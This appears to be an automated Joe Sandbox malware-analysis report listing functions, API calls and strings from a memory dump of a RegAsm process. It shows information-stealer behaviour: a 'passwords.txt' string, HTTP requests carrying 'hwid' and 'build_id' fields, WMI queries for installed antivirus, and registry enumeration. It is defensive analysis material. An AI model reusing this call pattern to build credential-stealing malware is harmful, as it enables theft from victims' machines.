Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Strings

passwords.txt, xrefs: 0040D0E9

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
String ID: passwords.txt
API String ID: 3298853120-347816968
Opcode ID: 16e945ce64b20133c2c4d0f591e4d00528f13ba0582766f6449613239d0af3e7
Instruction ID: 21993153d337d11a48586c4bf259aa876be5ea877b61fef3d37d114593fc008d
Opcode Fuzzy Hash: 16e945ce64b20133c2c4d0f591e4d00528f13ba0582766f6449613239d0af3e7
Instruction Fuzzy Hash: CEC1AC31800249EFDF05EBE1DD4AAEEBB75FF15308F10001AF515B21A2DBB91A98DB65

Function 00414BED Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414BF2

Part of subcall function 004141CF: _EH_prolog.MSVCRT ref: 004141D4

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DBE
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3F

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00413C5D: _EH_prolog.MSVCRT ref: 00413C62
Part of subcall function 00413C5D: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CC0

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414F6B
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414FEC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415118
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415199
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004152C5
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415346
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415472
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004154ED
Sleep.KERNEL32(0000EA60), ref: 004154FC

Part of subcall function 00413D3B: _EH_prolog.MSVCRT ref: 00413D40
Part of subcall function 00413D3B: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DC2
Part of subcall function 00413D3B: lstrlenA.KERNEL32(00000000), ref: 00413DD9
Part of subcall function 00413D3B: StrStrA.SHLWAPI(00000000,00000000), ref: 00413E00
Part of subcall function 00413D3B: lstrlenA.KERNEL32(00000000), ref: 00413E15
Part of subcall function 00413D3B: lstrlenA.KERNEL32(00000000), ref: 00413E30

Strings

ERROR, xrefs: 00414F5D
ERROR, xrefs: 004152B7
ERROR, xrefs: 0041510A
ERROR, xrefs: 0041518B
ERROR, xrefs: 00415338
ERROR, xrefs: 00414FDE
*, xrefs: 00415633
ERROR, xrefs: 00415464
ERROR, xrefs: 00414DB0
ERROR, xrefs: 00414E31
ERROR, xrefs: 004154DF

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpylstrlen$Sleep
String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1345713276-3681523784
Opcode ID: 962ab7fb177a8381e91971ddb91efc42a3d8f7f3ca013ddd275886a2c04a0db9
Instruction ID: 4071c4c1e21e007a3019606e845e43124d0260a014e9a5c2e1f70957f149c55d
Opcode Fuzzy Hash: 962ab7fb177a8381e91971ddb91efc42a3d8f7f3ca013ddd275886a2c04a0db9
Instruction Fuzzy Hash: EC629570D04248EADB11EBE5CA46BDEBBB86F55304F50409FF445B3281DBB85B88CB66

Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00403AFA

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00426995,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
InternetCloseHandle.WININET(00000000), ref: 00404107
InternetCloseHandle.WININET(?), ref: 0040411C
InternetCloseHandle.WININET(?), ref: 00404125

Strings

------, xrefs: 00403C3E
", xrefs: 00403E7A
hwid, xrefs: 00403E50
!, xrefs: 004040E6
------, xrefs: 00403DA8
------, xrefs: 00403EF7
build_id, xrefs: 00403F9F
", xrefs: 00403FC9

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1139859944-3346224549
Opcode ID: 18cb711966be742517941a479245f8bd4c49043186f681aaf289eb8dec36014f
Instruction ID: 326b07f710812bac9a8072c184c7ec01e03bdaeb8c023f9a6bf16b5fd3034a1d
Opcode Fuzzy Hash: 18cb711966be742517941a479245f8bd4c49043186f681aaf289eb8dec36014f
Instruction Fuzzy Hash: C122627180024CEADB05EBE5C996EEEBBB8AF55308F10405EE54573182DFB81BC8DB65

Function 00407277 Relevance: 33.5, APIs: 22, Instructions: 511
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040727C

Part of subcall function 004107D1: StrCmpCA.SHLWAPI(?,?,?,004095C8,00426E5C,00000000), ref: 004107DA

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426C58,?,?,?,00426C2A,?,00000000), ref: 004073E8

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00411CFF: _EH_prolog.MSVCRT ref: 00411D04
Part of subcall function 00411CFF: memset.MSVCRT ref: 00411D26
Part of subcall function 00411CFF: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411DAD
Part of subcall function 00411CFF: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411DBB
Part of subcall function 00411CFF: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411DC2

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004075DA
RtlAllocateHeap.NTDLL(00000000), ref: 004075E1
lstrcat.KERNEL32(00000000,00000000), ref: 004076FF
lstrcat.KERNEL32(00000000,00426C74), ref: 0040770D
lstrcat.KERNEL32(00000000,00000000), ref: 0040771F
lstrcat.KERNEL32(00000000,00426C78), ref: 0040772D
lstrlenA.KERNEL32(00000000), ref: 00407874
lstrlenA.KERNEL32(00000000), ref: 00407882

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

memset.MSVCRT ref: 004078DA
DeleteFileA.KERNEL32(00000000), ref: 004078FF

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
String ID:
API String ID: 4187064601-0
Opcode ID: 46ff8fadbfa485ce8fd25f9b9f6ac98ca9296a1127ab0744fbf592ea14209ca5
Instruction ID: a2af334b6b21932232f4ce19869a9dd9bef3aefac5b7fcb4a0c352fba6ca0383
Opcode Fuzzy Hash: 46ff8fadbfa485ce8fd25f9b9f6ac98ca9296a1127ab0744fbf592ea14209ca5
Instruction Fuzzy Hash: 0822AF31804248EEDF05EBE5DD56AEEBB74AF15308F10405EF405721D2EFB81A98DB6A

Function 00411425 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0041142A
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004277B0,00000000,?,Work Dir: In memory,00000000), ref: 00411442
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411453
CoCreateInstance.OLE32(00428080,00000000,00000001,00427FB0,?,?,00000000,?,?,?,?,?,?,004277B0,00000000,?), ref: 0041146D
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004114A3
VariantInit.OLEAUT32(?), ref: 004114FE

Part of subcall function 0041136D: _EH_prolog.MSVCRT ref: 00411372
Part of subcall function 0041136D: CoCreateInstance.OLE32(00427E30,00000000,00000001,00427510,?,00000001,00000000,00000000,00000001,?,00000000), ref: 00411399
Part of subcall function 0041136D: SysAllocString.OLEAUT32(?), ref: 004113A6
Part of subcall function 0041136D: _wtoi64.MSVCRT ref: 004113E1
Part of subcall function 0041136D: SysFreeString.OLEAUT32(?), ref: 004113F4
Part of subcall function 0041136D: SysFreeString.OLEAUT32(00000000), ref: 004113FB

FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,004277B0,00000000,?,Work Dir: In memory,00000000), ref: 00411536
GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798), ref: 0041153C
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,004277B0,00000000,?,Work Dir: In memory), ref: 00411549
VariantClear.OLEAUT32(?), ref: 0041158B
wsprintfA.USER32 ref: 00411575

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Strings

%d/%d/%d %d:%d:%d, xrefs: 0041156F
Unknown, xrefs: 00411597
Unknown, xrefs: 004115B6
Select * From Win32_OperatingSystem, xrefs: 004114B3
ROOT\CIMV2, xrefs: 00411480
Unknown, xrefs: 004115BD
WQL, xrefs: 004114B8
InstallDate, xrefs: 00411510

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2456697202-461178377
Opcode ID: 46b04e2fc80f455cec2cdde97de4e72e6c86c02b693bc9a2b4b16de3a8120ff1
Instruction ID: d324a1c5f698c5e6b5cbe3405f753cbb3c1a22271b8d1c4f5e3087c10ca3d1af
Opcode Fuzzy Hash: 46b04e2fc80f455cec2cdde97de4e72e6c86c02b693bc9a2b4b16de3a8120ff1
Instruction Fuzzy Hash: 10517A71A01228BBCB20DB95DC49EEFBFBDEF49B11F104116F615E6190C7789A41CBA8

Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00404F2F

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
StrCmpCA.SHLWAPI(?), ref: 00404FA6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
InternetCloseHandle.WININET(00000000), ref: 004050DD
InternetCloseHandle.WININET(?), ref: 004050E6
InternetCloseHandle.WININET(?), ref: 004050EF

Strings

GET, xrefs: 00404FF7
ERROR, xrefs: 00405059
ERROR, xrefs: 00405140

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 2435781452-2509457195
Opcode ID: 6b55fa30f2069670c7dd171ffe474b2a1569b2694aa1f14c0e1ffa1ba61e9402
Instruction ID: 7509ee6a954004b1a9741030f0d9afb547496701c902486f96bcb8a68f907b04
Opcode Fuzzy Hash: 6b55fa30f2069670c7dd171ffe474b2a1569b2694aa1f14c0e1ffa1ba61e9402
Instruction Fuzzy Hash: 0C517C72900119AFEB10EBA0DD95EFFBBBDEB05344F10402AF605A6181DB795E84CFA5

Function 004115CE Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004115D3
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798,00000000,?,00000000), ref: 004115EB
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000), ref: 004115FC
CoCreateInstance.OLE32(00428080,00000000,00000001,00427FB0,?,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798,00000000,?), ref: 00411616
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?), ref: 0041164C
VariantInit.OLEAUT32(?), ref: 0041169F

Part of subcall function 00411936: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004116C6,?,?,00000000,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798,00000000), ref: 0041193E
Part of subcall function 00411936: CharToOemW.USER32(?,00000000), ref: 0041194A

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

VariantClear.OLEAUT32(?), ref: 004116D4

Strings

Select * From AntiVirusProduct, xrefs: 0041165C
Unknown, xrefs: 004116FF
root\SecurityCenter2, xrefs: 00411629
displayName, xrefs: 004116B1
WQL, xrefs: 00411661
Unknown, xrefs: 00411706
Unknown, xrefs: 004116E0

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3694693100-315474579
Opcode ID: 26208991c4a0040ff71acd9b8d6a5b3f653d5773b6a2b76a1a951c477171bf90
Instruction ID: 4b529131da20957c74c79cdda5e9c06b6caa70a42569ab1591aec5b58da68b91
Opcode Fuzzy Hash: 26208991c4a0040ff71acd9b8d6a5b3f653d5773b6a2b76a1a951c477171bf90
Instruction Fuzzy Hash: 23419270A02229BBCB10DF95DC49EEFBF7DEF49B50F20450AF115A6190C7785A41CBA8

Function 00410D1A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410D1F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042734F,00000001,00000000), ref: 00410D67
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410DB1
wsprintfA.USER32 ref: 00410DDB
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410DF8
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410E22
lstrlenA.KERNEL32(?), ref: 00410E37
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427378), ref: 00410EB7

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Strings

- , xrefs: 00410EC1
%s\%s, xrefs: 00410DD5
?, xrefs: 00410D5D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 404191982-3278919252
Opcode ID: 940ad9c3f422ca70fa5f5c48b5282acaa30ceed0557badd1544825d9f8d8c940
Instruction ID: 528b649b58018e2f91931f670d0e252fe2fe3c0834149eed9d98a40891053875
Opcode Fuzzy Hash: 940ad9c3f422ca70fa5f5c48b5282acaa30ceed0557badd1544825d9f8d8c940
Instruction Fuzzy Hash: C57117B180025CEEDF11DF91CD85EEEBBBDBF19304F10005AE505B2151EBB95A88CB65

Function 00411186 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041118B
